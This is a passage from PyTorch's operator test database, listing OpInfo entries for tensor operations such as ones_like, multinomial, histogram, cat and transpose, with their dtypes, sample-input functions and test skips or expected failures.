'test_get_torch_func_signature_exhaustive'), )), OpInfo('ones_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('randn_like', dtypes=floating_types_and(torch.half, torch.bfloat16, torch.complex32, torch.complex64, torch.complex128), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randn_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, supports_sparse_csr=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Expected: randn_like is not comparable between dtypes"), 'TestCommon', 'test_complex_half_reference_testing'), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), )), OpInfo('rand_like', dtypes=floating_types_and(torch.half, torch.bfloat16, torch.complex32, torch.complex64, torch.complex128), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randn_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 
'test_variant_consistency_jit'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: rand_like is not comparable between dtypes"), 'TestCommon', 'test_complex_half_reference_testing'), )), OpInfo('randint_like', dtypes=all_types_and(torch.half, torch.bfloat16), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randint_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_randint_like, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('full_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_full_like, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('new_zeros', op=lambda x, *args, **kwargs: x.new_zeros(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('new_ones', op=lambda x, *args, **kwargs: x.new_ones(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('new_empty', op=lambda x, *args, **kwargs: x.new_empty(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it.
DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: new_empty is not comparable"), 'TestCommon', 'test_complex_half_reference_testing'), ), supports_autograd=False), OpInfo('empty', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_empty, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. 
DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestLazyOpInfo'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_complex_half_reference_testing'), )), OpInfo('new_full', op=lambda x, *args, **kwargs: x.new_full(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_full, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('multinomial', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.multinomial, inp, *args, **kwargs), method_variant=lambda inp, *args, **kwargs: wrapper_set_seed(torch.Tensor.multinomial, inp, *args, **kwargs), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), supports_out=True, sample_inputs_func=sample_inputs_multinomial, error_inputs_func=error_inputs_multinomial, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Strides are not the same! # This may not be reproducible in CI DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning')), supports_autograd=False), OpInfo('normal', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.normal, inp, *args, **kwargs), # The inplace variant (Tensor.normal_) is different from torch.normal inplace_variant=None, dtypes=floating_types_and(torch.bfloat16, torch.half), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, sample_inputs_func=sample_inputs_normal_tensor_first, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Tensor-likes are not close! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. 
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # NotImplementedError not raised DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), # Computed gradient is incorrect -- would be an exfail but gradgrad somehow passes DecorateInfo(unittest.skip("Gradients are incorrect!"), 'TestGradients'),)), OpInfo('normal', # This has its own variant b/c OpInfos assume the first arg is a Tensor but it is not here variant_test_name='number_mean', op=lambda std, mean, *args, **kwargs: wrapper_set_seed(torch.normal, mean, std, *args, **kwargs), # The inplace variant (Tensor.normal_) is different from torch.normal inplace_variant=None, dtypes=floating_types_and(torch.bfloat16, torch.half), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, sample_inputs_func=sample_inputs_normal_tensor_second, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # NotImplementedError not raised DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), # Computed gradient is incorrect -- would be an exfail but gradgrad somehow passes DecorateInfo(unittest.skip("Gradients are incorrect!"), 'TestGradients'),)), OpInfo('bernoulli', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.bernoulli, inp, *args, **kwargs), # The inplace variant (Tensor.bernoulli_) is different from torch.bernoulli inplace_variant=None, method_variant=lambda inp, *args, **kwargs: wrapper_set_seed(torch.Tensor.bernoulli, inp, *args, **kwargs), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_bernoulli, skips=( # vmap: We do not yet support calling random operations inside of vmap DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Expected RuntimeError when doing an unsafe cast from a result of # dtype torch.float32 into an out= with dtype torch.long DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it.
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'))), OpInfo('scatter_add', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_scatter_add, error_inputs_func=error_inputs_scatter_and_scatter_add, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('stack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_stack, assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # https://github.com/pytorch/pytorch/issues/77046 DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), ), ), OpInfo('hstack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), BinaryUfuncInfo('hypot', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False), OpInfo('histogram', dtypes=floating_types(), dtypesIfCUDA=_dispatch_dtypes(), # histogram is only implemented on CPU sample_inputs_func=sample_inputs_histogram, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0): # return torch.histogram(i0, 1, weight=tensor(-0.5735, dtype=torch.float32), density=False) # ~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Not Implemented on XLA. 
DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla'), )), OpInfo('histogramdd', dtypes=floating_types(), dtypesIfCUDA=_dispatch_dtypes(), # histogramdd is only implemented on CPU sample_inputs_func=sample_inputs_histogramdd, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('histc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64), sample_inputs_func=sample_inputs_histc, supports_out=True, supports_autograd=False, skips=( # CUDA histc returns a float tensor but does not correctly warn when passed an integral out tensor # "AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast # from a result of dtype torch.float32 into an out= with dtype torch.long" DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cuda'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), )), OpInfo('bincount', dtypes=integral_types_and(), sample_inputs_func=sample_inputs_bincount, supports_out=False, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('bucketize', dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), sample_inputs_func=sample_inputs_bucketize, supports_autograd=False, skips=( # JIT tests don't work with Tensor keyword arguments DecorateInfo(unittest.skip("Expected failure!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('searchsorted', dtypes=all_types_and(torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and(torch.float16), sample_inputs_func=sample_inputs_searchsorted, supports_autograd=False, ref=reference_searchsorted, skips=( # JIT tests don't work with Tensor keyword arguments # https://github.com/pytorch/pytorch/issues/58507 DecorateInfo(unittest.skip("Expected failure!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('cat', ref=_cat_np, aliases=('concat',), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.complex32), sample_inputs_func=sample_inputs_cat_concat, reference_inputs_func=reference_inputs_cat, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, skips=( # RuntimeError: Arguments for call not valid. # Expected a value of type 'List[Tensor]' for argument # 'tensors' but instead found type 'Tensor (inferred)'. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # see https://github.com/pytorch/pytorch/issues/71286 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness'),)), OpInfo('vstack', aliases=('row_stack',), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: _fn() Expected a value of type # 'Tensor (inferred)' for argument 't0' but instead found type 'tuple'. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'),)), OpInfo('dstack', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_hstack_dstack_vstack, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('unfold', op=lambda x, *args: x.unfold(*args), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), backward_dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Skip operator schema test because this is a functional and not an operator DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), sample_inputs_func=sample_inputs_unfold), OpInfo('msort', dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_msort), OpInfo('movedim', aliases=('moveaxis',), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_movedim_moveaxis), OpInfo('renorm', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_renorm, error_inputs_func=error_inputs_renorm), ShapeFuncInfo('repeat', op=lambda x, dims: x.repeat(dims), ref=np.tile, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_repeat_tile, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('squeeze', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_squeeze), UnaryUfuncInfo( 'fill', op=_fill_aten, ref=_fill_np, method_variant=None, inplace_variant=torch.Tensor.fill_, sample_kwargs=_fill_sample_kwargs, sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'value': True}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, skips=( # JIT has issue when op is passed as lambda # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 
'test_backward'), DecorateInfo(unittest.skip("No fill_ op"), 'TestCudaFuserOpInfo'), DecorateInfo(unittest.skip("No fill_ op"), 'TestNNCOpInfo'), )), OpInfo('resize_', op=lambda x, shape: x.clone().resize_(shape), method_variant=None, inplace_variant=torch.Tensor.resize_, # the test fails because resize_ doesn't work with imag views as expected by the test # https://github.com/pytorch/pytorch/issues/65945 test_neg_view=False, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, skips=( # Cannot resize variables that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_operator'), ), sample_inputs_func=sample_inputs_resize_ops), OpInfo('resize_as_', op=lambda x, other: torch.resize_as_(x.clone(), other), method_variant=None, inplace_variant=torch.Tensor.resize_as_, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, skips=( # Cannot resize variables that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), ), sample_inputs_func=sample_inputs_resize_ops), OpInfo('take_along_dim', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_take_along_dim, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), ShapeFuncInfo('tile', ref=np.tile, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_repeat_tile), OpInfo('trapz', # TODO: in the future, 'trapz' should be made a proper alias of 'trapezoid' dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_trapezoid), OpInfo('trapezoid', dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_trapezoid), OpInfo('cumulative_trapezoid', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_cumulative_trapezoid,), OpInfo('unsqueeze', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, assert_jit_shape_analysis=True, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused sample_inputs_func=sample_unsqueeze), BinaryUfuncInfo('xlogy', aliases=('special.xlogy',), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, skips=( # nan vs nan comparisons # 
https://github.com/pytorch/pytorch/issues/74279 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), )), OpInfo('zero_', op=lambda x: torch.zero_(x.clone()), method_variant=None, inplace_variant=torch.Tensor.zero_, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_gradgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), sample_inputs_func=sample_inputs_zero_), BinaryUfuncInfo('special.xlog1py', aten_name='special_xlog1py', dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=all_types_and(torch.bool, torch.bfloat16), backward_dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, skips=( # nan vs 0 comparisons # https://github.com/pytorch/pytorch/issues/74279 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), )), BinaryUfuncInfo('special.zeta', aten_name='special_zeta', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, supports_autograd=False, supports_one_python_scalar=True), # TODO: FIXME # OpInfo entry to verify the gradient formula of `other`/`q` # BinaryUfuncInfo('special.zeta', # op=lambda q, x, **kwargs: torch.special.zeta(x, q, **kwargs), # aten_name='special_zeta', # variant_test_name='grad', # dtypes=all_types_and(torch.bool), # promotes_int_to_float=True, # supports_autograd=True, # supports_rhs_python_scalar=False, # decorators=[ # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable") # ], # skips=( # # Lambda doesn't work in JIT test # # AssertionError: JIT Test does not execute any logic # DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit"), # )), OpInfo('logsumexp', aliases=('special.logsumexp',), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.half), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_logsumexp), OpInfo('trace', dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_inplace_autograd=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_trace), OpInfo('transpose', ref=_numpy_ref_transpose, aliases=('swapdims', 'swapaxes'), assert_jit_shape_analysis=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_transpose_swapdims), OpInfo('T', op=lambda x: x.T, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_T), OpInfo('H', op=lambda x: x.H, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, 
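           # Quick reference for the T/H/mT/mH attribute entries here and
           # below (hedged, illustrative identities; `.H` is only defined
           # for 2-D tensors):
           #   >>> a = torch.randn(2, 3, dtype=torch.complex64)
           #   >>> torch.equal(a.H, a.transpose(0, 1).conj())
           #   True
           #   >>> torch.equal(a.mH, a.transpose(-2, -1).conj())
           #   True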
supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_T), OpInfo('mT', op=lambda x: x.mT, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_adjoint), OpInfo('mH', op=lambda x: x.mH, aliases=('adjoint',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_adjoint), OpInfo('tril', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tril_triu), OpInfo('triu', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tril_triu), OpInfo('kron', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_kron), OpInfo('inner', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), 